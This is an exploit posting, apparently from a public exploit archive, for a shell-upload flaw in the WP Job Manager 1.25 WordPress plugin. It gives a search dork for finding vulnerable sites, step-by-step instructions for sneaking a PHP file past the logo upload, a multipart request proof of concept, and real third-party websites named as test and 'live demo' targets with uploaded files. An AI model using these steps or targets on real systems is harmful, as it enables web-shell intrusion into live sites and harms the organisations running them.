Home / os / winmobile

WordPress WP Job Manager 1.25 Shell Upload

Posted on 12 July 2016

###################### # Exploit Title : Wordpress WP Job Manager 1.25 Arbitrary File Upload Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:/wp-content/uploads/job-manager-uploads # Software link : http://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip # Vendor Homepage : https://wpjobmanager.com/ # version : 1.25.0 # Tested on: [ Windows ] # skype:xbadgirl21 # Date: 2016/07/11 # video Proof : https://youtu.be/nx-WtfdOkLc ###################### # [+] DESCRIPTION : ###################### # [+] WP Job Manager is a lightweight plugin for adding job-board functionality to your WordPress site. # [+] An arbitrary file upload web vulnerability has been detected in the WP Job Manager 1.25 and below. # [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory ###################### # [+] USAGE : ###################### # 1.- SELECT A WEBSITE FROM THE DORK ABOVE # 2.- GO TO POST A JOB URL <HOST><WP-PATH>/post-a-job/ [or] Look for it # 3.- Fill all the Fields No need to Register or Preview Then in Logo upload your FILE.jpg # 4.- Using Tamper Data or HTTP LIVE Headers change your FILE.TXT OR PHP # 5.- Go to url "http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/<Year/month>/<your-file-name>" ###################### # [+] Poc : ###################### # -----------------------------18132430516394 # Content-Disposition: form-data; name="script" # # true # -----------------------------18132430516394 # Content-Disposition: form-data; name="company_logo"; filename="x.txt" # Content-Type: image/jpeg # ###################### # [+] Test : ###################### # http://sala.sk.ca/wp-content/uploads/job-manager-uploads/company_logo//2016//07/xx.txt # http://www.ruralhumanservices.org/wp-content/uploads/job-manager-uploads/company_logo/2016//07/xx.txt ###################### # [+] File Path : ###################### # http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/2016//07/x.txt ###################### # [+] Live Demo : ###################### # http://www.ruralhumanservices.org/post-a-job/ # http://sala.sk.ca/post-a-job/ # http://www.elmundodeltransporte.com/publica-una-oferta-laboral # ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere #######################

 

TOP